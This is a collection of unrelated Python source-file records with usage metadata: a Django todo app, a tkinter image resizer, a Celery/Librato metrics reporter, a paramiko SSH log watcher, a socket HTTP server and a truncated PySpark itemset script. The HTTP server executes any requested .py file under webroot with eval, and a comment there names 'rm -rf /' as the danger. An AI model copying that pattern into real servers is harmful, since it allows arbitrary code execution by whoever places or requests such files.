[ { "api_name": "json.loads", "line_number": 25, "usage_type": "call" }, { "api_name": "requests.get", "line_number": 25, "usage_type": "call" }, { "api_name": "django.contrib.messages.info", "line_number": 38, "usage_type": "call" }, { "api_name": "django.contrib.messages", "line_number": 38, "usage_type": "name" }, { "api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call" }, { "api_name": "django.core.urlresolvers.reverse", "line_number": 39, "usage_type": "call" }, { "api_name": "django.core.paginator.Paginator", "line_number": 49, "usage_type": "call" }, { "api_name": "django.core.paginator.PageNotAnInteger", "line_number": 54, "usage_type": "name" }, { "api_name": "django.core.paginator.EmptyPage", "line_number": 56, "usage_type": "name" }, { "api_name": "annoying.decorators.render_to", "line_number": 41, "usage_type": "call" }, { "api_name": "django.shortcuts.get_object_or_404", "line_number": 63, "usage_type": "call" }, { "api_name": "annoying.decorators.render_to", "line_number": 61, "usage_type": "call" }, { "api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call" }, { "api_name": "django.shortcuts.redirect", "line_number": 75, "usage_type": "call" }, { "api_name": "django.shortcuts.get_object_or_404", "line_number": 77, "usage_type": "call" }, { "api_name": "annoying.decorators.render_to", "line_number": 65, "usage_type": "call" }, { "api_name": "django.shortcuts.get_object_or_404", "line_number": 86, "usage_type": "call" }, { "api_name": "django.contrib.messages.info", "line_number": 89, "usage_type": "call" }, { "api_name": "django.contrib.messages", "line_number": 89, "usage_type": "name" }, { "api_name": "django.shortcuts.redirect", "line_number": 90, "usage_type": "call" }, { "api_name": "django.core.urlresolvers.reverse", "line_number": 90, "usage_type": "call" } ]
11518226
from django.shortcuts import render, redirect from django.http import HttpResponse from .models import Task # Create your views here. def index_form(request): """ main page a list of tasks """ if request.method == "POST": # check done form done_id = request.POST.get("done", "") if done_id: task = Task.objects.filter(id=done_id) if task[0].status == 1: task.update(status=0) else: task.update(status=1) return redirect("/") # check filter filter = request.POST.get("filter", "") if filter == "end_date": tasks = Task.objects.order_by('end_date') return render(request, 'myapp/index.html', {'tasks':tasks}) elif filter == "start_data": tasks = Task.objects.order_by('name') return render(request, 'myapp/index.html', {'tasks':tasks}) elif filter == "priority": tasks = Task.objects.order_by('priority') return render(request, 'myapp/index.html', {'tasks':tasks}) elif filter == "dones": tasks = Task.objects.filter(status=1) return render(request, 'myapp/index.html', {'tasks':tasks}) elif filter == "remains": tasks = Task.objects.filter(status=0) return render(request, 'myapp/index.html', {'tasks':tasks}) else: tasks = Task.objects.order_by('id') return render(request, 'myapp/index.html', {'tasks':tasks}) else: tasks = Task.objects.all() return render(request, 'myapp/index.html', {'tasks':tasks}) def delete(request, id): """ remove a task by id """ task = Task.objects.filter(id=id) if request.method == "POST": task.update(status=1) return redirect("/") return render(request, "myapp/delete.html") def add_task(request): """ create a task """ if request.method == "POST": name = request.POST.get("name","") priority = request.POST.get("priority", "") end_date = request.POST.get("end_date", "") description = request.POST.get("description", "") task = Task(name=name, priority=priority, description=description, end_date=end_date) task.save() return redirect("/") else: return render(request, "myapp/add.html")
null
todolist/myapp/views.py
views.py
py
2,421
python
en
code
null
code-starcoder2
83
[ { "api_name": "models.Task.objects.filter", "line_number": 16, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 16, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 16, "usage_type": "name" }, { "api_name": "django.shortcuts.redirect", "line_number": 21, "usage_type": "call" }, { "api_name": "models.Task.objects.order_by", "line_number": 27, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 27, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 27, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call" }, { "api_name": "models.Task.objects.order_by", "line_number": 30, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 30, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 30, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call" }, { "api_name": "models.Task.objects.order_by", "line_number": 33, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 33, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 33, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call" }, { "api_name": "models.Task.objects.filter", "line_number": 36, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 36, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 36, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call" }, { "api_name": "models.Task.objects.filter", "line_number": 39, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 39, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 39, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call" }, { "api_name": "models.Task.objects.order_by", "line_number": 42, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 42, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 42, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call" }, { "api_name": "models.Task.objects.all", "line_number": 45, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 45, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 45, "usage_type": "name" }, { "api_name": "django.shortcuts.render", "line_number": 46, "usage_type": "call" }, { "api_name": "models.Task.objects.filter", "line_number": 54, "usage_type": "call" }, { "api_name": "models.Task.objects", "line_number": 54, "usage_type": "attribute" }, { "api_name": "models.Task", "line_number": 54, "usage_type": "name" }, { "api_name": "django.shortcuts.redirect", "line_number": 57, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 58, "usage_type": "call" }, { "api_name": "models.Task", "line_number": 70, "usage_type": "call" }, { "api_name": "django.shortcuts.redirect", "line_number": 72, "usage_type": "call" }, { "api_name": "django.shortcuts.render", "line_number": 74, "usage_type": "call" } ]
507408094
#!/usr/bin/python3 import tkinter as tk from tkinter.filedialog import askopenfilenames from PIL import Image import re import os class Application(tk.Frame): def __init__(self, parent): tk.Frame.__init__(self, parent, background="red") self.parent = parent self.actions = [{"display_text": "Change filetype", "options": [{"text": "Convert to jpg", "function": self.convert_to_jpg}, {"text": "Convert to png", "function": self.convert_to_png}]}, {"display_text": "Change size", "options": [{"text": "Size of all images smaller than a certain value.", "function": self.all_images_size}, {"text": "Make every image x times smaller.", "function": self.scale_images}, {"text": "Set maxium height or/and width of all images.", "function": self.set_maximum_size}]}, {"display_text": "Apply filter", "options": [{"text": "Sepia", "function": self.sepia_filter}, {"text": "Black-white", "function": self.black_and_white}]}] self.chosen_files = [] self.initUI() def initUI(self): self.parent.title("Imagero Changero") self.grid(row=0, column=0, rowspan=6, columnspan=10) self.main_container = tk.Frame(self, relief=tk.RAISED, borderwidth=1, background="white") self.main_container.grid(row=0, column=0, rowspan=5, columnspan=7) action_label = tk.Label(self.main_container, text="Action:") action_label.grid(row=0, column=0, sticky="w") self.var = tk.IntVar() action_radio = [] for i, action in enumerate(self.actions): action_radio.append(tk.Radiobutton(self.main_container, text=action["display_text"], variable=self.var, value=i, command=self.update_option_list)) action_radio[i].grid(row=0, column=(2 * i + 1), columnspan=2) self.option_list = tk.Listbox(self.main_container, bg="white", height=3, width=50) self.update_option_list() self.option_list.grid(row=1, column=0, columnspan=5, rowspan=3) self.browse_files = tk.Button(self.main_container, text="Choose photos", command=self.choose_photos) self.browse_files.grid(row=4, column=0, sticky="w") ok_button = tk.Button(self, text="Ok", command=self.do_action) ok_button.grid(row=5, column=6, sticky="e") quit_button = tk.Button(self, text="Quit", command=self.quit) quit_button.grid(row=5, column=5, sticky="e") def do_action(self): print("GO!") print("wybrana opcja:", self.var.get()) print("wybrana czynnosc:", self.option_list.curselection()) if self.var.get() == 1: print("dodatkowa opcja:", self.extra_option_spin1.get(), self.extra_option_spin2.get()) self.actions[self.var.get()]["options"][self.option_list.curselection()[0]]["function"]() def choose_photos(self): self.chosen_files = askopenfilenames() def update_option_list(self): self.option_list.delete(0, tk.END) for option in self.actions[self.var.get()]["options"]: self.option_list.insert(tk.END, option["text"]) if self.var.get() == 1: self.extra_option_label1 = tk.Label(self.main_container, text="Extra1") self.extra_option_label2 = tk.Label(self.main_container, text="Extra2") self.extra_option_label1.grid(row=1, column=5, sticky="w", columnspan=2) self.extra_option_label2.grid(row=2, column=5, sticky="w", columnspan=2) self.extra_option_spin1 = tk.Spinbox(self.main_container, from_=0, to=100, width=5) self.extra_option_spin2 = tk.Spinbox(self.main_container, from_=50, to=300, width=5) self.extra_option_spin1.grid(row=1, column=7, sticky="w", columnspan=2) self.extra_option_spin2.grid(row=2, column=7, sticky="w", columnspan=2) else: if hasattr(self, "extra_option_label1"): self.extra_option_label1.destroy() self.extra_option_label2.destroy() self.extra_option_spin1.destroy() self.extra_option_spin2.destroy() def convert_to_jpg(self): result = [] for old_path in self.chosen_files: img = Image.open(old_path) new_path = re.sub('\.png', '.jpg', old_path) new_name = new_path.split('/')[-1] result.append({"object": img, "name": new_name}) self.save_files(result) def convert_to_png(self): result = [] for old_path in self.chosen_files: img = Image.open(old_path) new_path = re.sub('\.jpg', '.png', old_path) new_name = new_path.split('/')[-1] result.append({"object": img, "name": new_name}) self.save_files(result) def all_images_size(self): print("make their size equal", self.extra_option_spin1.get()) max_size = int(self.extra_option_spin1.get()) * 1000000 #MB -> B actual_size = 0 files_len = len(self.chosen_files) for i in self.chosen_files: actual_size += os.stat(i).st_size if actual_size <= max_size - 1000000: self.save_files(result) return right_width, right_height = [], [] left_width, left_height = [0] * files_len, [0] * files_len new_width, new_height = [0] * files_len, [0] * files_len for img_path in self.chosen_files: img = Image.open(img_path) width, height = img.size right_width.append(width) right_height.append(height) while actual_size < max_size - 1000000 or actual_size > max_size + 1000000: print("SIZE:", actual_size/1000000, "LEFT[0]", left_height[0], "RIGHT[0]", right_height[0]) result = [] for i, old_path in enumerate(self.chosen_files): img = Image.open(old_path) name = old_path.split('/')[-1] new_width[i] = (right_width[i] + left_width[i]) // 2 new_height[i] = (right_height[i] + left_height[i]) // 2 resized_img = img.resize((new_width[i], new_height[i])) result.append({"object": resized_img, "name": name}) self.save_files(result) actual_size = 0 for i in os.listdir(): actual_size += os.stat(i).st_size for i in range(files_len): if actual_size > max_size: right_width[i] = new_width[i] right_height[i] = new_height[i] else: left_width[i] = new_width[i] left_height[i] = new_height[i] print("Pliki tyle zajmuja:", actual_size) def scale_images(self): print("scale images", self.extra_option_spin1.get(), "times") scale_num = int(self.extra_option_spin1.get())**0.5 result = [] for old_path in self.chosen_files: img = Image.open(old_path) name = old_path.split('/')[-1] width, height = img.size resized_img = img.resize((int(width / scale_num), int(height / scale_num))) result.append({"object": resized_img, "name": name}) self.save_files(result) def set_maximum_size(self): print("max height:", self.extra_option_spin1.get(), "max width:", self.extra_option_spin2.get()) max_height = int(self.extra_option_spin2.get()) max_width = int(self.extra_option_spin1.get()) result = [] for old_path in self.chosen_files: img = Image.open(old_path) name = old_path.split('/')[-1] width, height = img.size new_width = min(width, max_width) scale_num = width / new_width new_height = min(height, max_height) scale_num = max(height / new_height, scale_num) resized_img = img.resize((int(width / scale_num), int(height / scale_num))) result.append({"object": resized_img, "name": name}) self.save_files(result) def sepia_filter(self): print("sepia image", self.chosen_files) def black_and_white(self): print("greyscale", self.chosen_files) def save_files(self, images): if os.getcwd().split(os.sep)[-1] != "result": result_folder = os.path.join(os.getcwd(), "result") if not os.path.exists(result_folder): os.makedirs(result_folder) os.chdir(result_folder) for img in images: print(img["name"]) img["object"].save(img["name"]) print("Done!") def main(): root = tk.Tk() root.geometry("640x280") root.update() app = Application(root) root.mainloop() if __name__ == "__main__": main()
null
imagero.py
imagero.py
py
9,401
python
en
code
null
code-starcoder2
83
[ { "api_name": "tkinter.Frame", "line_number": 9, "usage_type": "attribute" }, { "api_name": "tkinter.Frame.__init__", "line_number": 11, "usage_type": "call" }, { "api_name": "tkinter.Frame", "line_number": 11, "usage_type": "attribute" }, { "api_name": "tkinter.Frame", "line_number": 37, "usage_type": "call" }, { "api_name": "tkinter.RAISED", "line_number": 37, "usage_type": "attribute" }, { "api_name": "tkinter.Label", "line_number": 40, "usage_type": "call" }, { "api_name": "tkinter.IntVar", "line_number": 43, "usage_type": "call" }, { "api_name": "tkinter.Radiobutton", "line_number": 46, "usage_type": "call" }, { "api_name": "tkinter.Listbox", "line_number": 51, "usage_type": "call" }, { "api_name": "tkinter.Button", "line_number": 55, "usage_type": "call" }, { "api_name": "tkinter.Button", "line_number": 58, "usage_type": "call" }, { "api_name": "tkinter.Button", "line_number": 60, "usage_type": "call" }, { "api_name": "tkinter.filedialog.askopenfilenames", "line_number": 72, "usage_type": "call" }, { "api_name": "tkinter.END", "line_number": 75, "usage_type": "attribute" }, { "api_name": "tkinter.END", "line_number": 77, "usage_type": "attribute" }, { "api_name": "tkinter.Label", "line_number": 79, "usage_type": "call" }, { "api_name": "tkinter.Label", "line_number": 80, "usage_type": "call" }, { "api_name": "tkinter.Spinbox", "line_number": 83, "usage_type": "call" }, { "api_name": "tkinter.Spinbox", "line_number": 84, "usage_type": "call" }, { "api_name": "PIL.Image.open", "line_number": 97, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 97, "usage_type": "name" }, { "api_name": "re.sub", "line_number": 98, "usage_type": "call" }, { "api_name": "PIL.Image.open", "line_number": 106, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 106, "usage_type": "name" }, { "api_name": "re.sub", "line_number": 107, "usage_type": "call" }, { "api_name": "os.stat", "line_number": 118, "usage_type": "call" }, { "api_name": "PIL.Image.open", "line_number": 126, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 126, "usage_type": "name" }, { "api_name": "PIL.Image.open", "line_number": 134, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 134, "usage_type": "name" }, { "api_name": "os.listdir", "line_number": 142, "usage_type": "call" }, { "api_name": "os.stat", "line_number": 143, "usage_type": "call" }, { "api_name": "PIL.Image.open", "line_number": 158, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 158, "usage_type": "name" }, { "api_name": "PIL.Image.open", "line_number": 172, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 172, "usage_type": "name" }, { "api_name": "os.getcwd", "line_number": 190, "usage_type": "call" }, { "api_name": "os.sep", "line_number": 190, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 191, "usage_type": "call" }, { "api_name": "os.path", "line_number": 191, "usage_type": "attribute" }, { "api_name": "os.getcwd", "line_number": 191, "usage_type": "call" }, { "api_name": "os.path.exists", "line_number": 192, "usage_type": "call" }, { "api_name": "os.path", "line_number": 192, "usage_type": "attribute" }, { "api_name": "os.makedirs", "line_number": 193, "usage_type": "call" }, { "api_name": "os.chdir", "line_number": 194, "usage_type": "call" }, { "api_name": "tkinter.Tk", "line_number": 202, "usage_type": "call" } ]
316037642
import logging from celery.task import task from report_metric import reporter from report_metric import settings logging.basicConfig(level=logging.DEBUG) def setup_reporter(destination=None, source=None): destination = destination or settings.get('METRICS_DESTINATION', 'librato') source = source or settings.get('METRICS_SOURCE', None) if destination == 'librato' and reporter.LIBRATO and settings.get('METRICS_LIBRATO_USER'): return reporter.LibratoReport(username=settings.get('METRICS_LIBRATO_USER'), api_key=settings.get('METRICS_LIBRATO_TOKEN'), source=source) elif destination == 'direct': return reporter.DirectReport() elif destination == 'dummy': return reporter.DummyReport() raise reporter.StatsReportException('No available/configured destination') # maybe not right exception def gauge(name, number, **kwargs): ''' Helper method for single call sending of a gauge :param name: metric name :param number: metric number :param destination: optional, if not sending to default :return: ''' if settings.get('METRICS_USE_CELERY', False): _report_gauge.delay(name, number, **kwargs) else: _report_gauge(name, number, **kwargs) def counter(name, number=1, **kwargs): ''' Helper method for single call sending of a counter :param name: metric name :param number: metric number :param destination: optional, if not sending to default :return: ''' if settings.get('METRICS_USE_CELERY', False): _report_counter.delay(name, number, **kwargs) else: _report_counter(name, number, **kwargs) # There's got to be a more elegant way to conditionally wrap a function in Task, but for the moment @task(name='report_metric.gauge') def _report_gauge(name, number, **kwargs): try: rep = setup_reporter(kwargs.get('destination', None), kwargs.get('source', None)) rep.gauge(name, number) except reporter.StatsReportException as e: logging.exception(str(e)) @task(name='report_metric.counter') def _report_counter(name, number=1, **kwargs): try: setup_reporter(kwargs.get('destination', None), kwargs.get('source', None)).counter(name, number) except reporter.StatsReportException as e: logging.exception(str(e))
null
src/report_metric/metric.py
metric.py
py
2,404
python
en
code
null
code-starcoder2
83
[ { "api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute" }, { "api_name": "report_metric.settings.get", "line_number": 12, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 12, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 13, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 13, "usage_type": "name" }, { "api_name": "report_metric.reporter.LIBRATO", "line_number": 15, "usage_type": "attribute" }, { "api_name": "report_metric.reporter", "line_number": 15, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 15, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 15, "usage_type": "name" }, { "api_name": "report_metric.reporter.LibratoReport", "line_number": 16, "usage_type": "call" }, { "api_name": "report_metric.reporter", "line_number": 16, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 16, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 16, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 17, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 17, "usage_type": "name" }, { "api_name": "report_metric.reporter.DirectReport", "line_number": 21, "usage_type": "call" }, { "api_name": "report_metric.reporter", "line_number": 21, "usage_type": "name" }, { "api_name": "report_metric.reporter.DummyReport", "line_number": 23, "usage_type": "call" }, { "api_name": "report_metric.reporter", "line_number": 23, "usage_type": "name" }, { "api_name": "report_metric.reporter.StatsReportException", "line_number": 25, "usage_type": "call" }, { "api_name": "report_metric.reporter", "line_number": 25, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 36, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 36, "usage_type": "name" }, { "api_name": "report_metric.settings.get", "line_number": 50, "usage_type": "call" }, { "api_name": "report_metric.settings", "line_number": 50, "usage_type": "name" }, { "api_name": "report_metric.reporter.StatsReportException", "line_number": 62, "usage_type": "attribute" }, { "api_name": "report_metric.reporter", "line_number": 62, "usage_type": "name" }, { "api_name": "logging.exception", "line_number": 63, "usage_type": "call" }, { "api_name": "celery.task.task", "line_number": 57, "usage_type": "call" }, { "api_name": "report_metric.reporter.StatsReportException", "line_number": 70, "usage_type": "attribute" }, { "api_name": "report_metric.reporter", "line_number": 70, "usage_type": "name" }, { "api_name": "logging.exception", "line_number": 71, "usage_type": "call" }, { "api_name": "celery.task.task", "line_number": 66, "usage_type": "call" } ]
480371716
from configparser import ConfigParser from random import Random from json import JSONEncoder import paramiko import os import time import eel import json import sys class Eagle(object): def __init__(self, config_filename, send_fn): self.running = False self.ssh = None self.sftp = None self.logs = {} # Retrieve configuration from external config file self.config = ConfigParser() self.config.read(os.sep.join([os.getcwd(), config_filename])) self.username = self.get_config('username') self.domain = self.get_config('flndevdomain') self.maxlines = int(self.get_config('maxlines')) self.gaflogsdir = self.get_config('gaflogsdir') self.thriftlogsdir = self.get_config('thriftlogsdir') self.remotetmp = self.get_config('remotetmpdir') self.tempfile = os.sep.join([self.remotetmp, 'log'+str(int(Random().random()*1e12))]) self.localdir = os.sep.join([os.getcwd(), 'logs']) self.send_log_to_user = send_fn def __del__(self): self.close() def get_config(self, option): if self.config: return self.config.get('eagle', option) def get_files_info(self, path): files_info = {} if self.sftp: for filename in self.sftp.listdir(path): if filename.split('.')[-1] in ['json', 'log', 'error']: fullpath = os.sep.join([path, filename]) filestat = self.sftp.stat(fullpath) files_info[filename] = dict( name=filename, longname=fullpath, date=filestat.st_mtime, size=filestat.st_size, mode=filestat.st_mode & 0x4, start=1, ) return files_info def get_logs_info(self): logs_info = {} logs_info.update(self.get_files_info(self.gaflogsdir)) logs_info.update(self.get_files_info(self.thriftlogsdir)) return logs_info def get_logs(self, log_info): print(f"Found changes on {log_info['name']}...") stdin, stdout, stderr = self.ssh.exec_command( 'sudo tail -n +%d -q %s | tail -n %d -q' % ( log_info['start'], log_info['longname'], self.maxlines ) ) messages = [ str(line) for line in stdout.readlines() ] json = JSONEncoder() return json.encode(messages) def send(self, log_info): log_name = log_info['name'] contents = self.get_logs(log_info) json = JSONEncoder() self.send_log_to_user(json.encode(dict(name=log_name, value=contents))) def watch(self): print("Starting EAGLE EYES....") try: # initially send the all log files print("Initial Loading of Logs...") self.logs = self.get_logs_info() for log_name in self.logs.keys(): self.send(self.logs[log_name]) print("Finished Initial Loading of Logs...") while self.running: print("Watching....") eel.sleep(0.5) logs_info = self.get_logs_info() for log_key in logs_info: if ( self.running and logs_info[log_key]['size'] != 0 and ( logs_info[log_key]['size'] != self.logs[log_key]['size'] or logs_info[log_key]['date'] != self.logs[log_key]['date'] ) ): # the remote file has changed, send the log self.send(logs_info[log_key]) # update the cached log info self.logs[log_key] = logs_info[log_key] except Exception as e: print(e) print("Disconnecting") self.running = False self.close() sys.exit() def open(self, hostname): if hostname: self.ssh = paramiko.SSHClient() self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) self.ssh.load_system_host_keys() self.ssh.connect( hostname='.'.join([hostname, self.domain]), username=self.username ) self.sftp = self.ssh.open_sftp() self.sftp.chdir(self.gaflogsdir) self.sftp.getcwd() self.running = True self.hostname = hostname def close(self): self.running = False if self.sftp: self.sftp.close() self.sftp = None if self.ssh: self.ssh.close() self.ssh = None def sleep(self, seconds): time.sleep(seconds)
null
src/eagle.py
eagle.py
py
4,878
python
en
code
null
code-starcoder2
83
[ { "api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call" }, { "api_name": "os.sep.join", "line_number": 21, "usage_type": "call" }, { "api_name": "os.sep", "line_number": 21, "usage_type": "attribute" }, { "api_name": "os.getcwd", "line_number": 21, "usage_type": "call" }, { "api_name": "os.sep.join", "line_number": 28, "usage_type": "call" }, { "api_name": "os.sep", "line_number": 28, "usage_type": "attribute" }, { "api_name": "random.Random", "line_number": 28, "usage_type": "call" }, { "api_name": "os.sep.join", "line_number": 29, "usage_type": "call" }, { "api_name": "os.sep", "line_number": 29, "usage_type": "attribute" }, { "api_name": "os.getcwd", "line_number": 29, "usage_type": "call" }, { "api_name": "os.sep.join", "line_number": 47, "usage_type": "call" }, { "api_name": "os.sep", "line_number": 47, "usage_type": "attribute" }, { "api_name": "json.JSONEncoder", "line_number": 76, "usage_type": "call" }, { "api_name": "json.encode", "line_number": 78, "usage_type": "call" }, { "api_name": "json.JSONEncoder", "line_number": 84, "usage_type": "call" }, { "api_name": "json.encode", "line_number": 85, "usage_type": "call" }, { "api_name": "eel.sleep", "line_number": 101, "usage_type": "call" }, { "api_name": "sys.exit", "line_number": 124, "usage_type": "call" }, { "api_name": "paramiko.SSHClient", "line_number": 128, "usage_type": "call" }, { "api_name": "paramiko.AutoAddPolicy", "line_number": 129, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 152, "usage_type": "call" } ]
151928741
import ast import io import mimetypes import re import socket import sys import traceback from pathlib import Path WEBROOT = "webroot" def response_ok(body=b"This is a minimal response", mimetype=b"text/plain"): """ returns a basic HTTP response Ex: response_ok( b"<html><h1>Welcome:</h1></html>", b"text/html" ) -> b''' HTTP/1.1 200 OK\r\n Content-Type: text/html\r\n \r\n <html><h1>Welcome:</h1></html>\r\n ''' """ try: return b"""HTTP/1.1 200 OK\r Content-Type: """ + mimetype + b"""\r \r """ + body except TypeError: return b"""HTTP/1.1 500 Internal Server Error Content-Type: text/html <title>500 Internal Server Error</title> <h1>Internal Server Error</h1> <p>The server encountered an error and could not complete your request.</p> """.replace(b'\n', b'\r\n') def response_method_not_allowed(): """Returns a 405 Method Not Allowed response""" return b"""HTTP/1.1 405 Method Not Allowed Content-Type: text/html <title>405 Method Not Allowed</title> <h1>Method Not Allowed</h1> <p>The method is not allowed for the requested URL.</p> """.replace(b'\n', b'\r\n') def response_not_found(): """Returns a 404 Not Found response""" return b"""HTTP/1.1 404 Not Found Content-Type: text/html <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL was not found on the server.</p> """.replace(b'\n', b'\r\n') def parse_request(request): """ Given the content of an HTTP request, returns the path of that request. This server only handles GET requests, so this method shall raise a NotImplementedError if the method of the request is not GET. """ match = re.match(r"([^\s]+) ([^\s]+) ([^\s]+)", request) if match: if match.group(1) == "GET": return match.group(2) raise NotImplementedError def response_path(path): """ This method should return appropriate content and a mime type. If the requested path is a directory, then the content should be a plain-text listing of the contents with mimetype `text/plain`. If the path is a file, it should return the contents of that file and its correct mimetype. If the path does not map to a real location, it should raise an exception that the server can catch to return a 404 response. Ex: response_path('/a_web_page.html') -> (b"<html><h1>North Carolina...", b"text/html") response_path('/images/sample_1.png') -> (b"A12BCF...", # contents of sample_1.png b"image/png") response_path('/') -> (b"images/, a_web_page.html, make_type.py,...", b"text/plain") response_path('/a_page_that_doesnt_exist.html') -> Raises a NameError """ file = Path(WEBROOT + path) if file.is_dir(): content = file.absolute().name for child in file.iterdir(): content += '\n - ' + child.name content = content.encode() mime_type = b"text/plain" elif file.is_file(): content = file.read_bytes() mime_type = mimetypes.guess_type(file)[0].encode() else: raise NameError if mime_type == b'text/x-python': # If we ended up productionizing this we would want to scrub the, um, contents of content # to make sure that it's not going to do anything bad. Even though theoretically we're not # taking inputs from untrusted sources here (we're /certainly/ not letting the user upload # files..) we can't make a blanket trust statement here that the script isn't going to do # anything nefarious like subprocess.Popen('rm -rf /'.split(' ')) or anything like that. # Still, as an exercise: # Create an IO buffer and set stdout to it -- we can compile the contents of file to # bytecode and evaluate it with exec() or eval(), but it will print to stdout. tmp = sys.stdout eval_content = io.StringIO() sys.stdout = eval_content eval(compile(content, file.name, 'exec')) content = eval_content.getvalue().encode() sys.stdout = tmp mime_type = b"text/html" return content, mime_type def server(log_buffer=sys.stderr): address = ('127.0.0.1', 10000) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) print("making a server on {0}:{1}".format(*address), file=log_buffer) sock.bind(address) sock.listen(1) try: while True: print('waiting for a connection', file=log_buffer) conn, addr = sock.accept() # blocking try: print('connection - {0}:{1}'.format(*addr), file=log_buffer) request = '' while True: data = conn.recv(1024) request += data.decode('utf8') if '\r\n\r\n' in request: break print("Request received:\n{}\n\n".format(request)) try: content, mime_type = response_path(parse_request(request)) response = response_ok( body=content, mimetype=mime_type ) except NotImplementedError: response = response_method_not_allowed() except NameError: response = response_not_found() conn.sendall(response) except: traceback.print_exc() finally: conn.close() except KeyboardInterrupt: sock.close() return except: traceback.print_exc() if __name__ == '__main__': server() sys.exit(0)
null
http_server.py
http_server.py
py
5,944
python
en
code
null
code-starcoder2
83
[ { "api_name": "re.match", "line_number": 75, "usage_type": "call" }, { "api_name": "pathlib.Path", "line_number": 110, "usage_type": "call" }, { "api_name": "mimetypes.guess_type", "line_number": 119, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 132, "usage_type": "attribute" }, { "api_name": "io.StringIO", "line_number": 133, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 134, "usage_type": "attribute" }, { "api_name": "sys.stdout", "line_number": 137, "usage_type": "attribute" }, { "api_name": "sys.stderr", "line_number": 144, "usage_type": "attribute" }, { "api_name": "socket.socket", "line_number": 146, "usage_type": "call" }, { "api_name": "socket.AF_INET", "line_number": 146, "usage_type": "attribute" }, { "api_name": "socket.SOCK_STREAM", "line_number": 146, "usage_type": "attribute" }, { "api_name": "socket.SOL_SOCKET", "line_number": 147, "usage_type": "attribute" }, { "api_name": "socket.SO_REUSEADDR", "line_number": 147, "usage_type": "attribute" }, { "api_name": "traceback.print_exc", "line_number": 183, "usage_type": "call" }, { "api_name": "traceback.print_exc", "line_number": 191, "usage_type": "call" }, { "api_name": "sys.exit", "line_number": 196, "usage_type": "call" } ]
421865152
from pyspark import SparkContext from itertools import islice, combinations, tee from operator import add from sys import argv from time import time def basket_mapper(element): comma_location = element.find(',') return element[:comma_location], element[(comma_location+1):] def read_baskets(): # Spark Context intitialize sc = SparkContext('local[*]', 'hw2_task_2') sc.setLogLevel("OFF") baskets = sc.textFile(argv[3]).mapPartitionsWithIndex(lambda i, element: islice(element, 1, None) if i == 0 else element).\ map(basket_mapper).groupByKey().\ map(lambda basket: basket[1]).map(set).filter(lambda basket: len(basket) > int(argv[1])).repartition(3) # coalesce(12) #.persist() return sc, baskets def set_up_task2(): # create basket depending on case from command prompt sc, baskets = read_baskets() # use to calculate sample support support = 50 sample_support_vars = dict(num_baskets=baskets.count(), support=int(argv[2])) return sc, baskets, sample_support_vars def declare_son_vars(): # count of pass number frequent_item_set_candidates = dict() frequent_item_sets = dict() return frequent_item_set_candidates, frequent_item_sets def prune_baskets(basket, previous_frequent_item_sets): return basket.intersection(set(previous_frequent_item_sets)) def prune_candidates(n_baskets_partition, sample_support_vars, candidate_ids_dict): sample_support = sample_support_vars['support'] * n_baskets_partition / sample_support_vars['num_baskets'] frequent_item_set_candidates = tuple(k for k, v in candidate_ids_dict.items() if v >= sample_support) return frequent_item_set_candidates def update_item_set_dict(item_set_dict, item_set_candidate): if item_set_candidate in item_set_dict: item_set_dict[item_set_candidate] += 1 else: item_set_dict[item_set_candidate] = 1 return item_set_dict def phase_one(iterator, sample_support_vars, previous_frequent_item_sets, 